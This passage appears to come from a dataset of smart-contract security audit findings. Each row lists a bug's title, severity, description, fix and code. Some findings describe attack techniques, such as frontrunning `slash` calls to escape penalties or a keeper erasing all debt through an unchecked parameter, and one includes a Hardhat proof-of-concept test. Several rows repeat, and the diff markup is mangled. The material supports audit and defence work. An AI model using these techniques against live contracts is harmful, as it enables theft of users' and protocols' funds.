Since the oracle can be up to 2% different from the true price, the user can unfairly lose part of their funds.",Use the stETH/USD oracle instead because it has a 1-hour heartbeat and a 1% deviation threshold.,User will be unfairly penalized due large variance between on-chain price and asset price,"```\\nfunction getTknOhmPrice() public view override returns (uint256) {\\n // Get stETH per wstETH (18 Decimals)\\n uint256 stethPerWsteth = IWsteth(pairToken).stEthPerToken();\\n\\n // Get ETH per OHM (18 Decimals)\\n uint256 ethPerOhm = _validatePrice(ohmEthPriceFeed.feed, ohmEthPriceFeed.updateThreshold);\\n\\n // Get stETH per ETH (18 Decimals)\\n uint256 stethPerEth = _validatePrice(\\n stethEthPriceFeed.feed,\\n stethEthPriceFeed.updateThreshold\\n );\\n\\n // Calculate wstETH per OHM (18 decimals)\\n return (ethPerOhm * 1e36) / (stethPerWsteth * stethPerEth);\\n}\\n```\\n" +Normal users could be inadvertently grieved by the withdrawn ratios check,medium,"The contract check on the withdrawn ratios of OHM and wstETH against the current oracle price could run into grieving naive users by taking any wstETH shifted imbalance as a fee to the treasury even though these users have not gamed the system.\\nHere is a typical scenario, assuming the pool has been initiated with total LP equal to sqrt(100_000 * 1_000) = 10_000. (Note: OHM: $15, wstETH: $1500 with the pool pricing match up with manager.getOhmTknPrice() or manager.getTknOhmPrice(), i.e. 100 OHM to 1 wstETH or 0.01 wstETH to 1 OHM. 
The pool token balances in each step below may be calculated via the Constant Product Simulation after each swap and stake.)\\n```\\nOHM token balance: 100_000\\nwstETH token balance: 1_000\\nTotal LP: 10_000\\n```\\n\\nA series of swap activities results in the pool shifted more of the LP into wstETH.\\nOHM token balance: 90_909.1 wstETH token balance: 1_100 Total LP: 10_000\\nBob calls `deposit()` by providing 11 wstETH where 1100 OHM is minted with 1100 - 90909.1 * 0.01 = 190.91 unused OHM burned. (Note: Bob successfully stakes with 909.09 OHM and 11 wstETH and proportionately receives 100 LP.)\\nOHM token balance: 91_818.19 wstETH token balance: 1_111 Total LP: 10_100 User's LP: 100\\nBob changes his mind instantly and proceeds to call `withdraw()` to remove all of his LP. He receives the originally staked 909.09 OHM and 11 wstETH. All OHM is burned but he is only entitled to receive 909.09 / 100 = 9.09 wstETH since the system takes any arbs relative to the oracle price for the Treasury and returns the rest to the owner.\\nOHM token balance: 90_909.1 wstETH token balance: 1_100 Total LP: 10_000 User's LP: 0","Consider implementing a snapshot of the entry record of OHM and wstETH and compare that with the proportionate exit record. 
Slash only the differential for treasury solely on dissuading large attempts to shift the pool around, and in this case it should be 0 wstETH since the originally staked wstETH is no greater than expectedWstethAmountOut.","Bob suffers a loss of 11 - 9.09 = 1.91 wstETH (~ 17.36% loss), and the system is ready to trap the next user given the currently imbalanced pool still shifted more of the LP into wstETH.",```\\nOHM token balance: 100_000\\nwstETH token balance: 1_000\\nTotal LP: 10_000\\n```\\n +Periphery#_swapPTsForTarget won't work correctly if PT is mature but redeem is restricted,medium,"Periphery#_swapPTsForTarget doesn't properly account for mature PTs that have their redemption restricted\\nPeriphery.sol#L531-L551\\n```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n\\nAdapters can have their redeem restricted meaning the even when they are mature they can't be redeemed. In the scenario that it is restricted Periphery#_swapPTsForTarget simply won't work.","Use the same structure as _removeLiquidity:\\n```\\n if (divider.mscale(adapter, maturity) > 0) {\\n if (uint256(Adapter(adapter).level()).redeemRestricted()) {\\n ptBal = _ptBal;\\n } else {\\n // 2. 
Redeem PTs for Target\\n tBal += divider.redeem(adapter, maturity, _ptBal);\\n }\\n```\\n",Redemption will fail when redeem is restricted because it tries to redeem instead of swapping,"```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n" +sponsorSeries() method fails when user want to swap for stake token using,medium,"`sponsorSeries()` fails when user want to use `swapQuote` to swap for stake token to sponsor a series.\\nstake is token that user need to deposit (technically is pulled) to be able to sponsor a series for a given target. User has option to send `SwapQuote calldata quote` and swap any ERC20 token for stake token. Below is the code that doing transferFrom() of stakeToken not sellToken()\\n```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n\\nExpected behaviour of this function is to pull `sellToken` from msg.sender when `address(quote.sellToken) != stake`. For example- stake token is WETH. User want to swap DAI for WETH in `sponsorSeries()`. In this case, user would be sending SwapQuote.sellToken = DAI and swapQuote.buyToke = WETH and expect that fillQuote() would swap it for WETH. 
This method will fail because `sellToken` not transferred from msg.sender.",Consider implementation of functionality to transferFrom `sellToken` from msg.sender with actual amount that is require to get exact amountOut greater or equal to `stakeSize`,sponsorSeries() fails when `address(quote.sellToken) != stake`,"```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n" +Refund of protocol fee is being to wrong user,medium,"There is one function, _fillQuote(), which is handling swap from `0x`. Ideally If there is any remaining protocol fee (in ETH) then it will be returned to sender aka msg.sender. There are scenarios when fee can be sent to receiver of swap instead.\\nPeriphery and RollerPeriphery both are using almost identical logic in `_fillQuote()` hence this vulnerability affect both contracts. It exist if qupte.buyToken is ETH and there is any remaining protocol fee.\\nHere are pieces of puzzle\\nAfter swap if buyToken == ETH then store contract ETH balance in `boughtAmount`\\n```\\n// RollerPeriphery.sol\\n boughtAmount = address(quote.buyToken) == ETH ? address(this).balance : quote.buyToken.balanceOf(address(this));\\n```\\n\\nNext it store refundAmt\\n```\\n// RollerPeriphery.sol\\n // Refund any unspent protocol fees (paid in ether) to the sender.\\n uint256 refundAmt = address(this).balance;\\n```\\n\\nCalculate actual refundAmt and transfer to sender\\n```\\n if (address(quote.buyToken) == ETH) refundAmt = refundAmt - boughtAmount;\\n payable(msg.sender).transfer(refundAmt);\\n```\\n\\nThis is clear that due to line 251, 258 and 259, refundAmt is 0. So sender is not getting refund.\\nLater on in logic flow buyToken will be transferred to receiver\\n```\\n address(quote.buyToken) == ETH\\n ? 
payable(receiver).transfer(amtOut)\\n : ERC20(address(quote.buyToken)).safeTransfer(receiver, amtOut); // transfer bought tokens to receiver\\n```\\n",Consider intercepting refund amount properly when buyToken is ETH or else just handle refund when buyToken is NOT ETH and write some explanation around it.,Sender is not getting protocol fee refund.,```\\n// RollerPeriphery.sol\\n boughtAmount = address(quote.buyToken) == ETH ? address(this).balance : quote.buyToken.balanceOf(address(this));\\n```\\n +sponsorSeries() method fails when user want to swap for stake token using,medium,"`sponsorSeries()` fails when user want to use `swapQuote` to swap for stake token to sponsor a series.\\nstake is token that user need to deposit (technically is pulled) to be able to sponsor a series for a given target. User has option to send `SwapQuote calldata quote` and swap any ERC20 token for stake token. Below is the code that doing transferFrom() of stakeToken not sellToken()\\n```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n\\nExpected behaviour of this function is to pull `sellToken` from msg.sender when `address(quote.sellToken) != stake`. For example- stake token is WETH. User want to swap DAI for WETH in `sponsorSeries()`. In this case, user would be sending SwapQuote.sellToken = DAI and swapQuote.buyToke = WETH and expect that fillQuote() would swap it for WETH. 
This method will fail because `sellToken` not transferred from msg.sender.",Consider implementation of functionality to transferFrom `sellToken` from msg.sender with actual amount that is require to get exact amountOut greater or equal to `stakeSize`,sponsorSeries() fails when `address(quote.sellToken) != stake`,"```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n" +Periphery#_swapPTsForTarget won't work correctly if PT is mature but redeem is restricted,medium,"Periphery#_swapPTsForTarget doesn't properly account for mature PTs that have their redemption restricted\\nPeriphery.sol#L531-L551\\n```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n\\nAdapters can have their redeem restricted meaning the even when they are mature they can't be redeemed. In the scenario that it is restricted Periphery#_swapPTsForTarget simply won't work.","Use the same structure as _removeLiquidity:\\n```\\n if (divider.mscale(adapter, maturity) > 0) {\\n if (uint256(Adapter(adapter).level()).redeemRestricted()) {\\n ptBal = _ptBal;\\n } else {\\n // 2. 
Redeem PTs for Target\\n tBal += divider.redeem(adapter, maturity, _ptBal);\\n }\\n```\\n",Redemption will fail when redeem is restricted because it tries to redeem instead of swapping,"```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n" +The createMarket transaction lack of expiration timestamp check,medium,"The createMarket transaction lack of expiration timestamp check\\nLet us look into the heavily forked Uniswap V2 contract addLiquidity function implementation\\n```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = 
UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n\\nthe implementation has two point that worth noting,\\nthe first point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\n\\nThe transaction can be pending in mempool for a long time and can be executed in a long time after the user submit the transaction.\\nProblem is createMarket, which calculates the length and maxPayout by block.timestamp inside it.\\n```\\n // Calculate market length and check time bounds\\n uint48 length = uint48(params_.conclusion - block.timestamp); \\\\n if (\\n length < minMarketDuration ||\\n params_.depositInterval < minDepositInterval ||\\n params_.depositInterval > length\\n ) revert Auctioneer_InvalidParams();\\n\\n // Calculate the maximum payout amount for this market, determined by deposit interval\\n uint256 capacity = params_.capacityInQuote\\n ? 
params_.capacity.mulDiv(scale, price)\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n\\nAfter the market is created at wrong time, user can call purchase. At purchaseBond(),\\n```\\n // Payout for the deposit = amount / price\\n //\\n // where:\\n // payout = payout tokens out\\n // amount = quote tokens in\\n // price = quote tokens : payout token (i.e. 200 QUOTE : BASE), adjusted for scaling\\n payout = amount_.mulDiv(term.scale, price);\\n\\n // Payout must be greater than user inputted minimum\\n if (payout < minAmountOut_) revert Auctioneer_AmountLessThanMinimum();\\n\\n // Markets have a max payout amount, capping size because deposits\\n // do not experience slippage. max payout is recalculated upon tuning\\n if (payout > market.maxPayout) revert Auctioneer_MaxPayoutExceeded();\\n```\\n\\npayout value is calculated by term.scale which the market owner has set assuming the market would be created at desired timestamp. 
Even, maxPayout is far bigger than expected, as it is calculated by very small length.","Use deadline, like uniswap","Even though the market owner close the market at any time, malicious user can attack the market before close and steal unexpectedly large amount of payout Tokens.","```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, 
msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n" +"""Equilibrium price"" is not used to compute the capacity (OSDA Only)",medium,"""Equilibrium price"" is not used to compute the capacity leading to a smaller-than-expected max payout.\\nIn OFDA, it was observed that if the capacity is denominated in the quote token, the capacity will be calculated with the discounted price.\\n```\\nFile: BondBaseOFDA.sol\\n function _createMarket(MarketParams memory params_) internal returns (uint256) {\\n..SNIP..\\n // Calculate the maximum payout amount for this market\\n uint256 capacity = params_.capacityInQuote\\n ? params_.capacity.mulDiv(\\n scale,\\n price.mulDivUp(\\n uint256(ONE_HUNDRED_PERCENT - params_.fixedDiscount),\\n uint256(ONE_HUNDRED_PERCENT)\\n )\\n )\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n\\nHowever, in OSDA, if the capacity is denominated in the quote token, the capacity will be calculated with the oracle price instead of the discounted price.\\n```\\nFile: BondBaseOSDA.sol\\n function _createMarket(MarketParams memory params_) internal returns (uint256) {\\n..SNIP..\\n // Calculate the maximum payout amount for this market, determined by deposit interval\\n uint256 capacity = params_.capacityInQuote\\n ? params_.capacity.mulDiv(scale, price)\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n\\nIn OSDA, it was also observed that the base discount is applied to the oracle price while calculating the price decimals because this will be the initial equilibrium price of the market. 
However, this ""initial equilibrium price"" is not used earlier when computing the capacity.\\n```\\nFile: BondBaseOSDA.sol\\n function _validateOracle(\\n uint256 id_,\\n IBondOracle oracle_,\\n ERC20 quoteToken_,\\n ERC20 payoutToken_,\\n uint48 baseDiscount_\\n )\\n..SNIP..\\n // Get the price decimals for the current oracle price\\n // Oracle price is in quote tokens per payout token\\n // E.g. if quote token is $10 and payout token is $2000,\\n // then the oracle price is 200 quote tokens per payout token.\\n // If the oracle has 18 decimals, then it would return 200 * 10^18.\\n // In this case, the price decimals would be 2 since 200 = 2 * 10^2.\\n // We apply the base discount to the oracle price before calculating\\n // since this will be the initial equilibrium price of the market.\\n int8 priceDecimals = _getPriceDecimals(\\n currentPrice.mulDivUp(\\n uint256(ONE_HUNDRED_PERCENT - baseDiscount_),\\n uint256(ONE_HUNDRED_PERCENT)\\n ),\\n oracleDecimals\\n );\\n```\\n","Applied the discount to obtain the ""equilibrium price"" before computing the capacity.\\n```\\n// Calculate the maximum payout amount for this market, determined by deposit interval\\nuint256 capacity = params_.capacityInQuote\\n// Remove the line below\\n ? params_.capacity.mulDiv(scale, price)\\n// Add the line below\\n ? params_.capacity.mulDiv(scale, price.mulDivUp(\\n// Add the line below\\n uint256(ONE_HUNDRED_PERCENT // Remove the line below\\n params_.baseDiscount),\\n// Add the line below\\n uint256(ONE_HUNDRED_PERCENT)\\n// Add the line below\\n )\\n// Add the line below\\n )\\n : params_.capacity;\\nmarket.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n","As the discount is not applied to the price when computing the capacity, the price will be higher which leads to a smaller capacity. A smaller capacity will in turn result in a smaller max payout. 
A smaller-than-expected max payout reduces the maximum number of payout tokens a user can purchase at any single point in time, which might reduce the efficiency of a Bond market.\\nUsers who want to purchase a large number of bond tokens have to break their trade into smaller chunks to overcome the smaller-than-expected max payout, leading to unnecessary delay and additional gas fees.","```\\nFile: BondBaseOFDA.sol\\n function _createMarket(MarketParams memory params_) internal returns (uint256) {\\n..SNIP..\\n // Calculate the maximum payout amount for this market\\n uint256 capacity = params_.capacityInQuote\\n ? params_.capacity.mulDiv(\\n scale,\\n price.mulDivUp(\\n uint256(ONE_HUNDRED_PERCENT - params_.fixedDiscount),\\n uint256(ONE_HUNDRED_PERCENT)\\n )\\n )\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n" +"`slash` calls can be blocked, allowing malicious users to bypass the slashing mechanism.",medium,"A malicious user can block slashing by frontrunning `slash` with a call to `stake(1)` at the same block, allowing him to keep blocking calls to `slash` while waiting for his withdraw delay, effectively bypassing the slashing mechanism.\\nStakingModule's `checkpointProtection` modifier reverts certain actions, like claims, if the accounts' stake was previously modified in the same block. A malicious user can exploit this to intentionally block calls to `slash`.\\nConsider the following scenario, where Alice has `SLASHER_ROLE` and Bob is the malicious user.\\nAlice calls `slash` on Bob's account.\\nBob sees the transaction on the mempool and tries to frontrun it by staking 1 TEL. 
(See Proof of Concept section below for a simplified example of this scenario)\\nIf Bob's stake call is processed first (he can pay more gas to increase his odds of being placed before Alice), his new stake is pushed to `_stakes[address(Bob)]`, and his latest checkpoint (_stakes[address(Bob)]._checkpoints[numCheckpoints - 1]) `blockNumber` field is updated to the current `block.number`. So when `slash` is being processed in the same block and calls internally `_claimAndExit` it will revert due to the `checkpointProtection` modifier check (See code snippet below).\\n```\\nmodifier checkpointProtection(address account) {\\n uint256 numCheckpoints = _stakes[account]._checkpoints.length;\\n require(numCheckpoints == 0 || _stakes[account]._checkpoints[numCheckpoints - 1]._blockNumber != block.number, ""StakingModule: Cannot exit in the same block as another stake or exit"");\\n _;\\n}\\n```\\n\\nBob can do this indefinitely, eventually becoming a gas war between Alice and Bob or until Alice tries to use Flashbots Protect or similar services to avoid the public mempool. More importantly, this can be leveraged to block all `slash` attempts while waiting for the time required to withdraw, so the malicious user could call `requestWithdrawal()`, then keep blocking all future `slash` calls while waiting for his `withdrawalDelay`, then proceed to withdraw his stake when `block.timestamp > withdrawalRequestTimestamps[msg.sender] + withdrawalDelay`. 
Therefore bypassing the slashing mechanism.\\nIn this modified scenario:\\nAlice calls `slash` on Bob's account.\\nBob sees the transaction on the mempool and tries to frontrun it by staking 1 TEL.\\nBob requests his withdrawal (requestWithdrawal())\\nBob keeps monitoring the mempool for future calls to `slash` against his account, trying to frontrun each one of them.\\nWhen enough time has passed so that his withdrawal is available, Bob calls `exit` or `fullClaimAndExit`","Consider implementing a specific version of `_claimAndExit` without the `checkpointProtection` modifier, to be used inside the `slash` function.","Slashing calls can be blocked by a malicious user, allowing him to request his withdrawal, wait until the withdrawal delay has passed (while blocking further calls to slash) and then withdraw his funds.\\nI classify this one as medium severity, because even though there are ways to avoid being front-run, like paying much more gas or using services like Flashbots Protect, none is certain to work because the malicious user can use the same methods to their advantage. And if the malicious user is successful, this would result in loss of funds to the protocol (i.e. funds that should have been slashed, but the user managed to withdraw them)\\nProof of Concept\\nThe POC below shows that staking prevents any future call to `slash` on the same block. 
To reproduce this POC just copy the code to a file on the test/ folder and run it.\\n```\\nconst { expect } = require(""chai"")\\nconst { ethers, upgrades } = require(""hardhat"")\\n\\nconst emptyBytes = []\\n\\ndescribe(""POC"", () => {\\n let deployer\\n let alice\\n let bob\\n let telContract\\n let stakingContract\\n let SLASHER_ROLE\\n\\n beforeEach(""setup"", async () => {\\n [deployer, alice, bob] = await ethers.getSigners()\\n\\n //Deployments\\n const TELFactory = await ethers.getContractFactory(""TestTelcoin"", deployer)\\n const StakingModuleFactory = await ethers.getContractFactory(\\n ""StakingModule"",\\n deployer\\n )\\n telContract = await TELFactory.deploy(deployer.address)\\n await telContract.deployed()\\n stakingContract = await upgrades.deployProxy(StakingModuleFactory, [\\n telContract.address,\\n 3600,\\n 10\\n ])\\n\\n //Grant SLASHER_ROLE to Alice\\n SLASHER_ROLE = await stakingContract.SLASHER_ROLE()\\n await stakingContract\\n .connect(deployer)\\n .grantRole(SLASHER_ROLE, alice.address)\\n\\n //Send some TEL tokens to Bob\\n await telContract.connect(deployer).transfer(bob.address, 1)\\n\\n //Setup approvals\\n await telContract\\n .connect(bob)\\n .approve(stakingContract.address, 1)\\n })\\n\\n describe(""POC"", () => {\\n it(""should revert during slash"", async () => {\\n //Disable auto-mining and set interval to 0 necessary to guarantee both transactions\\n //below are mined in the same block, reproducing the frontrunning scenario.\\n await network.provider.send(""evm_setAutomine"", [false]);\\n await network.provider.send(""evm_setIntervalMining"", [0]);\\n\\n //Bob stakes 1 TEL\\n await stakingContract\\n .connect(bob)\\n .stake(1)\\n\\n //Turn on the auto-mining, so that after the next transaction is sent, the block is mined.\\n await network.provider.send(""evm_setAutomine"", [true]);\\n \\n //Alice tries to slash Bob, but reverts.\\n await expect(stakingContract\\n .connect(alice)\\n .slash(bob.address, 1, 
stakingContract.address, emptyBytes)).to.be.revertedWith(\\n ""StakingModule: Cannot exit in the same block as another stake or exit""\\n )\\n })\\n })\\n})\\n```\\n","```\\nmodifier checkpointProtection(address account) {\\n uint256 numCheckpoints = _stakes[account]._checkpoints.length;\\n require(numCheckpoints == 0 || _stakes[account]._checkpoints[numCheckpoints - 1]._blockNumber != block.number, ""StakingModule: Cannot exit in the same block as another stake or exit"");\\n _;\\n}\\n```\\n" +FeeBuyback.submit() method may fail if all allowance is not used by referral contract,medium,"Inside `submit()` method of `FeeBuyback.sol`, if token is `_telcoin` then it safeApprove to `_referral` contract. If `_referral` contract do not use all allowance then `submit()` method will fail in next call.\\n`SafeApprove()` method of library `SafeERC20Upgradeable` revert in following scenario.\\n```\\nrequire((value == 0) || (token.allowance(address(this), spender) == 0), \\n""SafeERC20: approve from non-zero to non-zero allowance"");\\n```\\n\\nSubmit method is doing `safeApproval` of Telcoin to referral contract. If referral contract do not use full allowance then subsequent call to `submit()` method will fails because of `SafeERC20: approve from non-zero to non-zero allowance`. `FeeBuyback` contract should not trust or assume that referral contract will use all allowance. If it does not use all allowance in `increaseClaimableBy()` method then `submit()` method will revert in next call. This vulnerability exists at two places in `submit()` method. 
Link given in code snippet section.","Reset allowance to 0 before non-zero approval.\\n```\\n_telcoin.safeApprove(address(_referral), 0);\\n_telcoin.safeApprove(address(_referral), _telcoin.balanceOf(address(this)));\\n```\\n",Submit() call will fail until referral contract do not use all allowance.,"```\\nrequire((value == 0) || (token.allowance(address(this), spender) == 0), \\n""SafeERC20: approve from non-zero to non-zero allowance"");\\n```\\n" +Missing input validation for _rewardProportion parameter allows keeper to escalate his privileges and pay back all loans,high,"They are also able to choose how much yield token to swap and what the proportion of the resulting TAU is that is distributed to users vs. not distributed in order to erase bad debt.\\nSo a `keeper` is not trusted to perform any actions that go beyond swapping yield / performing liquidations.\\nHowever there is a missing input validation for the `_rewardProportion` parameter in the `SwapHandler.swapForTau` function. This allows a keeper to ""erase"" all debt of users. So users can withdraw their collateral without paying any of the debt.\\nBy looking at the code we can see that `_rewardProportion` is used to determine the amount of `TAU` that `_withholdTau` is called with: Link\\n```\\n_withholdTau((tauReturned * _rewardProportion) / Constants.PERCENT_PRECISION);\\n```\\n\\nAny value of `_rewardProportion` greater than `1e18` means that more `TAU` will be distributed to users than has been burnt (aka erasing debt).\\nIt is easy to see how the `keeper` can chose the number so big that `_withholdTau` is called with a value close to `type(uint256).max` which will certainly be enough to erase all debt.","I discussed this issue with the sponsor and it is intended that the `keeper` role can freely chose the value of the `_rewardProportion` parameter within the `[0,1e18]` range, i.e. 
0%-100%.\\nTherefore the fix is to simply check that `_rewardProportion` is not bigger than 1e18:\\n```\\ndiff --git a/taurus-contracts/contracts/Vault/SwapHandler.sol b/taurus-contracts/contracts/Vault/SwapHandler.sol\\nindex c04e3a4..ab5064b 100644\\n--- a/taurus-contracts/contracts/Vault/SwapHandler.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/taurus-contracts/contracts/Vault/SwapHandler.sol\\n@@ -59,6 // Add the line below\\n59,10 @@ abstract contract SwapHandler is FeeMapping, TauDripFeed {\\n revert zeroAmount();\\n }\\n \\n// Add the line below\\n if (_rewardProportion > Constants.PERCENT_PRECISION) [\\n// Add the line below\\n revert invalidRewardProportion();\\n// Add the line below\\n ]\\n// Add the line below\\n\\n // Get and validate swap adapter address\\n address swapAdapterAddress = SwapAdapterRegistry(controller).swapAdapters(_swapAdapterHash);\\n if (swapAdapterAddress == address(0)) {\\n```\\n",A `keeper` can escalate his privileges and erase all debt. 
This means that `TAU` will not be backed by any collateral anymore and will be worthless.,```\\n_withholdTau((tauReturned * _rewardProportion) / Constants.PERCENT_PRECISION);\\n```\\n +`swap()` will be reverted if `path` has more tokens.,medium,"`swap()` will be reverted if `path` has more tokens, the keepers will not be able to successfully call `swapForTau()`.\\nIn test/SwapAdapters/00_UniswapSwapAdapter.ts:\\n```\\n // Get generic swap parameters\\n const basicSwapParams = buildUniswapSwapAdapterData(\\n [""0xyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy"", ""0xzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz""],\\n [3000],\\n testDepositAmount,\\n expectedReturnAmount,\\n 0,\\n ).swapData;\\n```\\n\\nWe will get:\\n```\\n000000000000000000000000000000000000000000000000000000024f49cbca\\n0000000000000000000000000000000000000000000000056bc75e2d63100000\\n0000000000000000000000000000000000000000000000055de6a779bbac0000\\n0000000000000000000000000000000000000000000000000000000000000080\\n000000000000000000000000000000000000000000000000000000000000002b\\nyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy000bb8zzzzzzzzzzzzzzzzzz\\nzzzzzzzzzzzzzzzzzzzzzz000000000000000000000000000000000000000000\\n```\\n\\nThen the `swapOutputToken` is `_swapData[length - 41:length - 21]`.\\nBut if we have more tokens in path:\\n```\\n const basicSwapParams = buildUniswapSwapAdapterData(\\n [""0xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"", ""0xyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy"", 